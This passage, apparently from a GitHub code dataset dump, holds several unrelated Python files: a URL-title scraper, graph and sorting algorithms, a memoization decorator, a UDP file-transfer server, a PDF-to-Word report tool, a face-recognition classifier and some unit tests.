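for prev, cur in zip(meshes, meshes[1:]):
    da = abs(results[cur][0] - results[prev][0])
    dc = abs(results[cur][1] - results[prev][1])
    status = "converged" if max(da, dc) < tol else "not converged"
    print(f"{prev} -> {cur}: |da|={da:.3f}, |dc|={dc:.3f} -> {status}")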
image:: https://github.com/abinit/abipy_assets/blob/master/run_relax_vs_kpts.png?raw=true\n# :alt: Evolution of the volume during the relaxation algorithm.\n","repo_name":"abinit/abipy","sub_path":"abipy/examples/flows/run_relax_vs_kpts.py","file_name":"run_relax_vs_kpts.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"72"} +{"seq_id":"24542897476","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\nimport csv\nimport pandas as pd\n\n# Opening the file and reading it\nwith open(\"dummy.csv\") as csvfile:\n csv_string = csvfile.read()\n # Sample URL tests\n # csv_string += \"https://aws.amazon.com/premiumsupport/knowledge-center/athena-hive-cursor-error/\"\n # csv_string += \"\\n https://aws.github.io/aws-eks-best-practices/\"\n \n# Where we'll store the URLs \ncsv_set = set()\n\nhtml_docs = []\ntitles = []\n\n\n# Main function to extract all URL's that contain the keyword \"aws\"\ndef find(string):\n regex = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n urls = re.findall(regex, string)\n for url in urls:\n # if url[0].startswith(\"https://aws.amazon.com/premiumsupport/knowledge-center/\"):\n if \"aws\" in url[0]:\n csv_set.add(url[0])\n\n# Grabbing all non-empty strings\ndef get_nonempty(list_of_strings):\n for s in list_of_strings:\n if s:\n return s\n \n\n# Invocation of main func \nfind(csv_string)\n\n\n# Getting the HTML docs for each URL\nfor url in csv_set:\n r = requests.get(url)\n html_docs.append(r.text)\n\n\n# Web Parsing each url\nfor doc in html_docs:\n soup = BeautifulSoup(doc, \"html.parser\")\n list_of_strings = soup.get_text().splitlines()\n # Grabbing the title\n lst = get_nonempty(list_of_strings)\n # If the title of the webpage has quotes...\n if '\"' in lst:\n # Replace it with an empty string \n lst = lst.replace('\"', '')\n \n titles.append(lst)\n\n# Uncomment to see list of titles \n# print(titles)\n\n# Turning the set back into a list\nurls = list(csv_set)\n\n# Matching the urls to titles\ntitle_urls = list(zip(urls, titles))\n\n# Uncomment to view list mapping titles to URL's\n# print(title_urls)\n\n# Writing our data to a new csv file\nwith open(\"out_csv.csv\", \"w\", newline=\"\") as new_csvfile:\n fieldnames = [\"Hyperlinks\"]\n writer = csv.DictWriter(new_csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for item in title_urls:\n writer.writerow({\"Hyperlinks\": '=HYPERLINK(\"' + item[0] +'\",\"' + item[1]+'\")' })\n\n# Converting it to an xlsx without duplicates\n# df = pd.read_csv(\"out_csv.csv\", sep=\",\");\n# df.drop_duplicates(subset=None, inplace=True)\n# df.to_excel(\"final_output.xlsx\", index=False)\n","repo_name":"KrishayR/Hyperlinking-URLs-to-titles","sub_path":"hyperlink.py","file_name":"hyperlink.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10781371354","text":"\"\"\"\nTopological Sort\nSteps:\n Input ==> Vertices: Integer\n Edges : List[(from(int), to(int)] # EDGE LIST\n 1. Initialize the Graph\n - inDegree = {i: 0 for i in range(vertices)} # Count of incoming edges\n - graph = {i: [] for i in range(vertices)}\n\n 2. Build the Graph\n - Iterate over all the edges\n - Put the Child into it's Parent's List\n - Increment Child's inDegree\n\n 3. 
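In the hyperlink.py record above, double quotes are deleted from page titles before they are embedded in =HYPERLINK() formulas. A more robust alternative is to escape a quote by doubling it, which is how Excel formula literals expect it; a short sketch (the file name and sample row are arbitrary):

import csv

def hyperlink_formula(url: str, title: str) -> str:
    esc = lambda s: s.replace('"', '""')  # Excel escapes a quote by doubling it
    return f'=HYPERLINK("{esc(url)}","{esc(title)}")'

rows = [("https://aws.amazon.com/", 'AWS "Cloud" Home')]
with open("out_csv.csv", "w", newline="") as f:
    writer = csv.writer(f)
    writer.writerow(["Hyperlinks"])
    for url, title in rows:
        writer.writerow([hyperlink_formula(url, title)])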
Find all the sources i.e., all the vertices with 0 in-degrees\n - Put all the sources in the bfsQueue\n\n 4. BFS Traversal\n - Pop the node\n - store the node value in sortedOrder\n - Get the node's children to decrement their inDegree\n - if the inDegree == 0 # It is a source now\n Add it the bfsQueue\n\n 5. Return the topological sort if there is no cycle\n if len(sortedOrder) != vertices\n\"\"\"\nfrom collections import deque\n\n\ndef topological_sort(vertices, edges):\n sortedOrder = []\n if vertices <= 0:\n return sortedOrder\n\n # a. Initialize the graph\n inDegree = {i: 0 for i in range(vertices)} # count of incoming edges\n graph = {i: [] for i in range(vertices)} # adjacency list graph\n\n # b. Build the graph\n for edge in edges:\n parent, child = edge[0], edge[1]\n graph[parent].append(child) # put the child into it's parent's list\n inDegree[child] += 1 # increment child's inDegree\n\n # c. Find all sources i.e., all vertices with 0 in-degrees\n sources = deque()\n for key in inDegree:\n if inDegree[key] == 0:\n sources.append(key)\n\n # d. For each source, add it to the sortedOrder and subtract one from all of its children's in-degrees\n # if a child's in-degree becomes zero, add it to the sources queue\n while sources:\n vertex = sources.popleft()\n sortedOrder.append(vertex)\n for child in graph[vertex]: # get the node's children to decrement their in-degrees\n inDegree[child] -= 1\n if inDegree[child] == 0:\n sources.append(child)\n\n # topological sort is not possible as the graph has a cycle\n return [] if len(sortedOrder) != vertices else sortedOrder\n\n\ndef main():\n print(\"Topological sort: \" +\n str(topological_sort(4, [[3, 2], [3, 0], [2, 0], [2, 1]])))\n print(\"Topological sort: \" +\n str(topological_sort(5, [[4, 2], [4, 3], [2, 0], [2, 1], [3, 1]])))\n print(\"Topological sort: \" +\n str(topological_sort(7, [[6, 4], [6, 2], [5, 3], [5, 4], [3, 0], [3, 1], [3, 2], [4, 1]])))\n\n\nmain()\n","repo_name":"sandeepyadav10011995/Data-Structures","sub_path":"IT Bodhi/Graphs/7. Topological Sort.py","file_name":"7. 
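The empty-list return at the end of topological_sort doubles as a cycle detector: in a cyclic graph some vertices never reach in-degree 0, so sortedOrder stays shorter than vertices. A quick demonstration, assuming topological_sort from the record above is in scope:

assert topological_sort(3, [[0, 1], [1, 2], [2, 0]]) == []    # 0 -> 1 -> 2 -> 0 is a cycle
assert topological_sort(3, [[0, 1], [1, 2]]) == [0, 1, 2]     # acyclic graph sorts fine
print("cycle guard works")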
Topological Sort.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27631133152","text":"import socket\nfrom util import *\n\nsend_file_path='D:/code/Learning/Computer_Network/lab2/send_data.txt'\n\nserver_socket=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\nserver_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\nserver_socket.bind(('127.0.0.1',6666))\n\nclient_addr=('127.0.0.1',6666)\nwhile True:\n message,clientAddress=server_socket.recvfrom(2048)\n if message.decode()=='begin':\n client_addr=clientAddress\n break\nGBN_send_file(server_socket,send_file_path,client_addr)\n\n_=input('send over press enter to exit')\nserver_socket.close()","repo_name":"hit-fushibo/HitLearningCode","sub_path":"Learning/Computer_Network/lab2/add2_server.py","file_name":"add2_server.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"35589105312","text":"import os\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom managers.pdf_manager import PdfManager\nfrom managers.word_manager import WordManager\nfrom managers.str_manager import StrManager\nfrom threading import Lock\nimport concurrent.futures\nfrom multiprocessing import freeze_support\n\n'''\nGenerate 34 VT files - 16 sec\n'''\n\n# Declaring a lock\nlock = Lock() ## is needed to lock MailMerge.write(), otherwise race condition.\npdf_manager = PdfManager()\nword_manager = WordManager()\n\ndef make_drawing_name(path_pdf: str):\n name_pdf = os.path.splitext(os.path.basename(path_pdf))[0]\n if name_pdf.count(\"-\") > 2:\n name_pdf = StrManager.change_last_dash_to_dot(name_pdf)\n return name_pdf + \".00\"\n\n#Define a function to clear the text\ndef clear_text():\n text.delete(1.0, END)\n\n# pdf_path example: C:/Users/SAMS/cw_technics_vt_automation/repo/CWT.MP21-28-162/Rasejumi ceham/MP21-28-162-03.pdf\ndef generate_vt(pdf_path: str):\n folder_destination = os.path.dirname(os.path.dirname(pdf_path))\n drawing = make_drawing_name(pdf_path) \n print(f\"Generating VT for {drawing}\")\n err_msg, my_pdf_data = pdf_manager.process_pdf(pdf_path) \n if err_msg is not None:\n #text.insert(1.0, f\"{drawing} {err_msg} \\n\") make this shit print from a thread\n print(f\"{drawing} {err_msg}\")\n else: \n lock.acquire()\n word_manager.create_word_from_template(\"repo\\VT-Template.docx\", folder_destination, my_pdf_data, drawing)\n lock.release()\n #text.insert(1.0, f\"{drawing} Word document is successfully generated\") \n\n#Define a function to open the pdf file\ndef open_pdf():\n files = filedialog.askopenfilenames(title=\"Select a PDF\", filetype=((\"PDF Files\",\"*.pdf\"),(\"All Files\",\"*.*\")))\n if not word_manager.template_exists():\n print(f\"\\nTemplate does not exist. Check \\\"{os.getcwd()}/{word_manager.PATH_VT_TEMPLATE}\\\"\")\n text.insert(END, f\"\\nTemplate does not exist. 
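The UDP server in the record above blocks until a datagram whose payload is "begin" arrives, then uses the sender's address as the transfer target. A hedged sketch of the matching client handshake; GBN_recv_file is an assumed helper from the same util module, not the repo's confirmed API:

import socket

client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_socket.sendto(b"begin", ("127.0.0.1", 6666))  # the handshake the server waits for
# GBN_recv_file(client_socket, "recv_data.txt")  # assumed util helper; path is arbitrary
client_socket.close()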
Check \\\"{os.getcwd()}/{word_manager.PATH_VT_TEMPLATE}\\\"\")\n return\n\n #file= filedialog.askopenfilenames(parent=win, title='Select a PDF')\n #if file:\n #for file in files:\n # generate_vt(file)\n if files:\n clear_text()\n text.insert(END, \"\\nBegin of the VT generation process\")\n text.update_idletasks()\n with concurrent.futures.ProcessPoolExecutor() as executor:\n executor.map(generate_vt, files)\n text.insert(END, \"\\nEnd of the VT generation process\") \n print(\"End.\")\n\ndef find_all_rasejumi_file_paths(path_folder: str) -> list:\n file_paths = []\n for root, dirs, files in os.walk(path_folder):\n if StrManager.is_rasejumi_in_string(root.split(os.path.sep)[-1]):\n file_paths.extend([os.path.join(root, f) for f in files])\n return file_paths\n\n# Walk through each nested folder including selected, check if the folder is \"rasejumi\", generate VTs for each \"rasejums\"\ndef open_folder():\n path_folder = filedialog.askdirectory()\n if not word_manager.template_exists():\n print(f\"\\nTemplate does not exist. Check \\\"{os.getcwd()}/{word_manager.PATH_VT_TEMPLATE}\\\"\")\n text.insert(END, f\"\\nTemplate does not exist. Check \\\"{os.getcwd()}/{word_manager.PATH_VT_TEMPLATE}\\\"\") \n return\n\n if path_folder:\n import time\n start = time.time()\n text.insert(END, \"\\nBegin of the VT generation process\")\n text.update_idletasks()\n\n file_paths = find_all_rasejumi_file_paths(path_folder)\n print(f\"{len(file_paths)} files found\")\n if file_paths:\n response = messagebox.askokcancel(\"askokcancel\", f\"{len(file_paths)} files found. Generate VTs?\")\n if response == 1:\n with concurrent.futures.ProcessPoolExecutor() as executor:\n executor.map(generate_vt, file_paths)\n \n else:\n text.insert(END, \"\\nCancelled\")\n\n else:\n text.insert(END, \"\\nCan't find \\\"Rasejumi\\\" folder\")\n text.insert(END, \"\\nEnd of the VT generation process\")\n end = time.time()\n print(f\"Success \\nTime elapsed: {round(end-start,4)} sec\")\n print(\"End.\")\n \n\n#Define function to Quit the window\ndef quit_app():\n win.destroy()\n \nif __name__ == '__main__':\n freeze_support() # For implemented multiprocessing. 
Without it many windows got opened and no error message printed.\n\n #Create an instance of tkinter frame\n win= Tk()\n #Set the Geometry\n win.geometry(\"750x450\")\n #Create a Text Box\n text= Text(win,width= 80,height=30)\n text.pack(pady=20)\n #Add a title\n win.title('VT Generator')\n #Create a Menu\n my_menu= Menu(win)\n win.config(menu=my_menu)\n #Add dropdown to the Menus\n file_menu=Menu(my_menu,tearoff=False)\n my_menu.add_cascade(label=\"File\",menu= file_menu)\n file_menu.add_command(label=\"Select folder\",command=open_folder)\n file_menu.add_command(label=\"Select PDF\",command=open_pdf)\n file_menu.add_command(label=\"Clear\",command=clear_text)\n file_menu.add_command(label=\"Quit\",command=quit_app)\n win.mainloop()","repo_name":"mixren/cw_technics_vt_automation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17688223425","text":"def selection_sort(arr):\n for i in range(len(arr) - 1):\n smallest_elem_index = i\n for j in range(i, len(arr)):\n if arr[j] < arr[smallest_elem_index]:\n smallest_elem_index = j\n if smallest_elem_index != i:\n arr[i], arr[smallest_elem_index] = arr[smallest_elem_index], arr[i]\n return arr\n\n\ndef bubble_sort(arr, opt=1):\n for i in range(len(arr) - 1):\n swap_occurred = False\n for j in range(len(arr) - (i + 1)):\n if arr[j] > arr[j + 1]:\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n swap_occurred = True\n if not swap_occurred:\n break\n return arr\n\n\n# def bubble_sort(arr, sorted_length=0):\n# unsorted_length = len(arr) - sorted_length\n# swap_occurred = False\n# for j in range(unsorted_length - 1):\n# if arr[j] > arr[j + 1]:\n# arr[j], arr[j + 1] = arr[j + 1], arr[j]\n# swap_occurred = True\n# if swap_occurred and unsorted_length:\n# bubble_sort(arr, sorted_length + 1)\n\n# return arr\n\n\n\"\"\"\nSTRETCH: implement the Counting Sort function below\n\nCounting sort is a sorting algorithm that works on a set of data where\nwe specifically know the maximum value that can exist in that set of\ndata. The idea behind this algorithm then is that we can create \"buckets\"\nfrom 0 up to the max value. This is most easily done by initializing an\narray of 0s whose length is the max value + 1 (why do we need this \"+ 1\"?).\n\nEach buckets[i] then is responsible for keeping track of how many times \nwe've seen `i` in the input set of data as we iterate through it.\nOnce we know exactly how many times each piece of data in the input set\nshowed up, we can construct a sorted set of the input data from the \nbuckets. 
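A quick property check for the two quadratic sorts above, comparing them against the built-in sorted() on random inputs; it assumes selection_sort and bubble_sort are in scope.

import random

def check(sort_fn, trials=100):
    for _ in range(trials):
        data = [random.randint(-50, 50) for _ in range(random.randint(0, 30))]
        assert sort_fn(list(data)) == sorted(data), sort_fn.__name__
    print(sort_fn.__name__, "ok")

check(selection_sort)
check(bubble_sort)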
\n\nWhat is the time and space complexity of the counting sort algorithm?\n\"\"\"\n\n\ndef counting_sort(arr, maximum=None):\n    sortedArr = [0 for n in arr]  # O(n)\n    if len(arr):\n        if not maximum:\n            maximum = arr[0]\n        for i in range(len(arr)):  # O(n)\n            if arr[i] < 0:\n                return \"Error, negative numbers not allowed in Count Sort\"\n            if arr[i] > maximum:\n                maximum = arr[i]\n\n        counterArr = [0 for i in range(maximum + 1)]  # O(k) where k is the max in arr\n\n        for num in arr:  # O(n)\n            counterArr[num] += 1\n        for i in range(1, len(counterArr)):  # O(k) where k is the max number in arr\n            counterArr[i] = counterArr[i - 1] + counterArr[i]\n\n        end = len(arr) - 1\n        while end >= 0:  # O(n)\n            current = arr[end]\n            index = counterArr[current] - 1\n            sortedArr[index] = current\n            counterArr[current] -= 1  # step the slot back so duplicate values fill earlier positions\n            end -= 1\n    return sortedArr\n\n    \"\"\"\n    1- The time complexity for this algorithm is O(n + k)\n    2- The space complexity is O(n + k) where k is the maximum number in the array\n    \"\"\"\n","repo_name":"rbabaci1/CS-Module-Iterative-Sorting","sub_path":"src/iterative_sorting/iterative_sorting.py","file_name":"iterative_sorting.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41237389955","text":"# File: memoized_decorator2.py\n# Author: Arbarr20, with online help\n# Date: 21/02/2023\n# Description: implements a cache that mimics the @lru_cache decorator; in this\n# case it is applied to a recursive function.\n\nimport sys\n\n# The memoized recursion below still nests roughly 2 * n frames for fibonacci(n),\n# so raise the limit before computing fibonacci(1000).\nsys.setrecursionlimit(5000)\n\n\nclass memoized(object):\n    \"\"\"\n    Implements a memoization decorator.\n\n    Memoization is an optimization technique used to speed up computation by\n    caching the results of calls to an expensive function. With memoization, if\n    the function is called again with the same arguments, the results do not need\n    to be recomputed, since they can be retrieved from the cache.\n\n    Attributes:\n        func: The function being memoized.\n        cache: The dictionary used to store the cached results.\n\n    Methods:\n        __call__(self, *args): Checks whether the function's result is already cached; if so,\n            returns the cached result. 
Otherwise, it computes the result and\n            stores it in the cache before returning it.\n\n        __repr__(self): Returns the docstring of the original function.\n    \"\"\"\n\n    def __init__(self, func):\n        self.func = func\n        self.cache = {}\n\n    def __call__(self, *args):\n        try:\n            print(self.cache)\n            return self.cache[args]\n        # runs when a key that is not present in the self.cache\n        # dictionary is looked up\n        except KeyError:\n            self.cache[args] = value = self.func(*args)\n            print(self.cache)\n            return value\n        except TypeError:\n            return self.func(*args)\n\n    def __repr__(self):\n        return self.func.__doc__\n\n\n# fibonacci = memoized(fibonacci)\n@memoized\ndef fibonacci(n):  # invokes memoized.__init__\n    \"\"\"\n    Recursive function that returns the Fibonacci number for n.\n\n    Attributes:\n        n: integer for which the Fibonacci number\n            is computed\n\n    \"\"\"\n    if n in (0, 1):\n        return n\n    menos_uno = fibonacci(n - 1)\n    menos_dos = fibonacci(n - 2)\n    return menos_uno + menos_dos\n\n\nprint(fibonacci(1000))  # runs __call__ on the memoized instance\n","repo_name":"arbarr20/python-notes","sub_path":"poo2/poo2-files/scripts_decoradores/memoized_decorator2.py","file_name":"memoized_decorator2.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70850319914","text":"import numpy as np\nimport pandas as pd\n\ndef get_topk_index(matrix, topk=10):\n    sorted_index = np.argsort(matrix)[:,::-1]\n    return sorted_index[:, 1:topk+1]\n\ndef get_recommend_with_topk_user(purchase_matrix, topk_index, target_purchase_matrix=None):\n    if target_purchase_matrix is None:\n        target_purchase_matrix = purchase_matrix\n    purchase_item_count = np.clip(purchase_matrix[topk_index] - target_purchase_matrix[:, np.newaxis, :], 0, 1)\n    purchase_item_count = np.sum(purchase_item_count, axis=1)\n    sorted_item_index = np.argsort(purchase_item_count)[:,::-1]\n    sorted_item_count = np.take_along_axis(purchase_item_count, sorted_item_index, axis=1)\n    return sorted_item_index, sorted_item_count\n\ndef get_recommend_with_topk_user_score(purchase_matrix, topk_index, similarity_score):\n    topk_score = np.take_along_axis(similarity_score, topk_index, axis=1)\n    topk_score = np.expand_dims(topk_score, axis=-1)\n    purchase_item_matrix = purchase_matrix[topk_index]\n    recommend_item_score = np.sum(purchase_item_matrix * topk_score, axis=1)\n    sorted_item_index = np.argsort(recommend_item_score)[:,::-1]\n    sorted_item_score = np.take_along_axis(recommend_item_score, sorted_item_index, axis=1)\n    return sorted_item_index, sorted_item_score\n\ndef get_recommend_matrix(purchase_matrix, recommend_item_index, recommend_flag=2):\n    for c_idx, col in enumerate(recommend_item_index):\n        for row in col:\n            purchase_matrix[c_idx][row] = recommend_flag\n    return purchase_matrix\n","repo_name":"cjwang0318/Recommendation","sub_path":"src/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1278749807","text":"from model import create_model\nimport numpy as np\nimport os.path\nimport cv2\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom align import AlignDlib\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom get_profile import getprofile\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import 
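The memoized class above is written to mimic functools.lru_cache, and the standard-library version gives bounded size and hit/miss statistics for free. Equivalent usage, with n kept small enough to stay within the default recursion limit:

from functools import lru_cache

@lru_cache(maxsize=None)
def fib(n):
    return n if n in (0, 1) else fib(n - 1) + fib(n - 2)

print(fib(300))
print(fib.cache_info())  # hit/miss counters, no hand-rolled dict needed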
LinearSVC\n\n\nnn4_small2_pretrained = create_model()\nnn4_small2_pretrained.load_weights('weights/nn4.small2.v1.h5')\n\n\n\nclass IdentityMetadata():\n def __init__(self, base, name, file):\n # dataset base directory\n self.base = base\n # identity name\n self.name = name\n # image file name\n self.file = file\n\n def __repr__(self):\n return self.image_path()\n\n def image_path(self):\n return os.path.join(self.base, self.name, self.file)\n\ndef load_metadata(path):\n metadata = []\n for i in sorted(os.listdir(path)):\n for f in sorted(os.listdir(os.path.join(path, i))):\n # Check file extension. Allow only jpg/jpeg' files.\n ext = os.path.splitext(f)[1]\n if ext == '.jpg' or ext == '.jpeg':\n metadata.append(IdentityMetadata(path, i, f))\n return np.array(metadata)\n\nmetadata = load_metadata('clusters')\nprint (metadata)\n\n\n\n#matplotlib inline\n\ndef load_image(path):\n img = cv2.imread(path, 1)\n # OpenCV loads images with color channels\n # in BGR order. So we need to reverse them\n return img[...,::-1]\n\ndef load_image1(img):\n # OpenCV loads images with color channels\n # in BGR order. So we need to reverse them\n return img[...,::-1]\n\n# Initialize the OpenFace face alignment utility\nalignment = AlignDlib('models/landmarks.dat')\n\n# Load an image\n#jc_orig = load_image(metadata[77].image_path())\n#print(jc_orig)\n\n# Detect face and return bounding box\n#bb = alignment.getLargestFaceBoundingBox(jc_orig)\n\n# Transform image using specified face landmark indices and crop image to 96x96\n#jc_aligned = alignment.align(96, jc_orig, bb, landmarkIndices=AlignDlib.OUTER_EYES_AND_NOSE)\n\n# Show original image\n#plt.subplot(131)\n#plt.imshow(jc_orig)\n#cv2.imshow('org img',jc_orig)\n#cv2.waitKey(0)\n\n# Show original image with bounding box\n#plt.subplot(132)\n#plt.imshow(jc_orig)\n#plt.gca().add_patch(patches.Rectangle((bb.left(), bb.top()), bb.width(), bb.height(), fill=False, color='red'))\n\n# Show aligned image\n#plt.subplot(133)\n#plt.imshow(jc_aligned)\n#cv2.imshow('aligned',jc_aligned)\n#cv2.waitKey(0)\n\ndef align_image(img):\n return alignment.align(96, img, alignment.getLargestFaceBoundingBox(img),\n landmarkIndices=AlignDlib.OUTER_EYES_AND_NOSE)\n\n\nembedded = np.zeros((metadata.shape[0], 128))\n\nfor i, m in enumerate(metadata):\n #print (m.image_path())\n #img = load_image(m)\n try:\n img=cv2.imread(m.image_path())\n img = align_image(img)\n #print ('img',img)\n # scale RGB values to interval [0,1]\n img = (img / 255.).astype(np.float32)\n # obtain embedding vector for image\n embedded[i] = nn4_small2_pretrained.predict(np.expand_dims(img, axis=0))[0]\n except:\n continue\n\n#print ('embedded',embedded)\n\ndef distance(emb1, emb2):\n return np.sum(np.square(emb1 - emb2))\n\ndef show_pair(idx1, idx2):\n plt.figure(figsize=(8,3))\n a=distance(embedded[idx1],embedded[idx2])\n # plt.suptitle(f'Distance = {distance(embedded[idx1], embedded[idx2]):.2f}')\n #plt.subplot(121)\n plt.imshow(load_image(metadata[idx1].image_path()))\n cv2.imshow('img1',load_image(metadata[idx1].image_path()))\n cv2.imshow('img2',load_image(metadata[idx2].image_path()))\n cv2.waitKey(0)\n #plt.subplot(122)\n #plt.imshow(load_image(metadata[idx2].image_path()))\n print (a)\n\n\n\ntargets = np.array([m.name for m in metadata])\n\nencoder = LabelEncoder()\nencoder.fit(targets)\n\n# Numerical encoding of identities\ny = encoder.transform(targets)\n\ntrain_idx = np.arange(metadata.shape[0]) % 2 != 0\ntest_idx = np.arange(metadata.shape[0]) % 2 == 0\n\n\n\n# 50 train examples of 10 identities (5 
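A toy illustration of the squared-L2 rule implemented by distance() above: two embeddings are treated as the same identity when their distance falls below a threshold (the 0.56 used here is an arbitrary example, not a tuned value):

import numpy as np

def distance(emb1, emb2):
    return np.sum(np.square(emb1 - emb2))

rng = np.random.default_rng(0)
anchor = rng.normal(size=128)
same = anchor + rng.normal(scale=0.02, size=128)  # small perturbation of the anchor
other = rng.normal(size=128)                      # unrelated embedding

threshold = 0.56  # assumption for illustration
print("same identity:", distance(anchor, same) < threshold)    # True
print("other identity:", distance(anchor, other) < threshold)  # False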
examples each)\nX_train = embedded[train_idx]\n# 50 test examples of 10 identities (5 examples each)\nX_test = embedded[test_idx]\n\ny_train = y[train_idx]\ny_test = y[test_idx]\n\nknn = KNeighborsClassifier(n_neighbors=1, metric='euclidean')\nsvc = LinearSVC()\n\nknn.fit(X_train, y_train)\nsvc.fit(X_train, y_train)\n\nacc_knn = accuracy_score(y_test, knn.predict(X_test))\nacc_svc = accuracy_score(y_test, svc.predict(X_test))\n\nprint('KNN accuracy', acc_knn, 'SVM accuracy', acc_svc)\n\n\n\nexample_idx = 12\n\nexample_image = load_image(metadata[test_idx][example_idx].image_path())\nexample_prediction = svc.predict([embedded[test_idx][example_idx]])\nexample_identity = encoder.inverse_transform(example_prediction)[0]\nprint(example_identity)\n\n\n\nprofile=getprofile(int(example_identity))\ncv2.imshow('test',example_image)\ncv2.waitKey(0)\n#plt.title(f'Recognized as {example_identity}')\n\nprint('recog as:',profile)\n","repo_name":"aqsa1996/MyProjects","sub_path":"Videobasedattendance/face_recog.py","file_name":"face_recog.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6912836537","text":"# Classify the student\ndef student():\n    a,b=map(int,input().split())\n    if a==1:\n        남학생(b)\n    elif a==2:\n        여학생(b)\n\n# Male-student function\ndef 남학생(n):\n    global length\n    for i in range(n-1,length,n):\n        condition[i]=not condition[i]\n\n# Female-student function\ndef 여학생(n):\n    n=n-1\n    global length\n    condition[n]=not condition[n]\n    i=1\n    while n+i<length and n-i>=0:\n        if condition[n+i]==condition[n-i]:\n            condition[n+i]=not condition[n+i]\n            condition[n-i]=not condition[n-i]\n        i+=1\n\n# Print the result\ndef result(aa):\n    for i in range(1,len(aa)+1):\n        print(aa[i-1], end=' ')\n        if i%20==0:\n            print()\n\n\n## Main ##\n'''\n# Read input\nglobal length\nlength=int(input(\"Number of switches:\"))\n\nglobal condition\ncondition=list(map(bool, map(int,input(\"Switch states:\").split())))\n\nN=int(input(\"Number of students:\"))\nfor i in range(N):\n    student()\n\ncondition=list(map(int,condition))\nresult(condition)\n'''\n\n\n#result([1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5])\n\n\nglobal length\nlength=8\nglobal condition\ncondition=list(map(bool, map(int,[0,1,0,1,0,0,0,1])))\n\n남학생(3)\n여학생(3)\ncondition=list(map(int,condition))\nresult(condition)\n\n","repo_name":"yellow-jam/BOJ","sub_path":"python/1244_스위치 켜고 끄기.py","file_name":"1244_스위치 켜고 끄기.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27734969746","text":"import unittest\nimport PIL.Image\nimport recognition.util.image\nimport recognition.util.path as path\n\nfrom recognition.model.darknet.yolov3 import YoloV3\nfrom recognition.parse.process import Process\n\n\nclass ProcessTestCase(unittest.TestCase):\n\n    def setUp(self):\n        self._transform = Process(anchors=path.get_anchors(), channel=3)\n\n    def test_serialize_and_deserialize(self):\n        image = PIL.Image.new('RGB', size=(576, 768), color=(255, 255, 255))\n\n        content = recognition.util.image.to_bytes(image)\n        serialize = self._transform.serialize(\n            content, b'label', size=(image.height, image.width),\n            bbox=[[105.5, 46.5, 470.5, 121.5, 0], [117.5, 136.5, 454.5, 151.5, 0]], bbox_max_length=2)\n\n        image, bbox = self._transform.deserialize(serialize)\n        self.assertEqual((416, 416, 3), image.shape)\n        self.assertEqual((1, 13, 13, 3, 6), bbox[0].shape)\n        self.assertEqual((1, 26, 26, 3, 6), bbox[1].shape)\n        self.assertEqual((1, 52, 52, 3, 6), bbox[2].shape)\n\n    def test_padded_shapes(self):\n        
self.assertIsNone(self._transform.padded_shapes())\n\n def test_convert(self):\n result = Process.convert([[[10, 10, 40, 40, 1, 1]]], 13, YoloV3.ANCHOR_MASKS[0])\n self.assertEqual([1, 13, 13, 3, 6], result.shape)\n\n result = Process.convert([[[10, 10, 40, 40, 1, 1]]], 26, YoloV3.ANCHOR_MASKS[1])\n self.assertEqual([1, 26, 26, 3, 6], result.shape)\n\n result = Process.convert([[[10, 10, 40, 40, 1, 1]]], 52, YoloV3.ANCHOR_MASKS[1])\n self.assertEqual([1, 52, 52, 3, 6], result.shape)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jonattanva/text-recognition","sub_path":"tests/parse/process_test.py","file_name":"process_test.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45296309255","text":"\"\"\"Automated tests for the Matchmaker class.\"\"\"\n\nimport unittest\nfrom unittest.mock import Mock\n\nfrom santa.matchmaker import Matchmaker\n\n\nclass TestMatchmaker(unittest.TestCase):\n \"\"\"Tests the Matchmaker class.\"\"\"\n\n def test_match_zero_person(self):\n \"\"\"Test the match() method with a list of zero Person objects.\"\"\"\n matchmaker = Matchmaker()\n\n with self.assertRaises(ValueError):\n 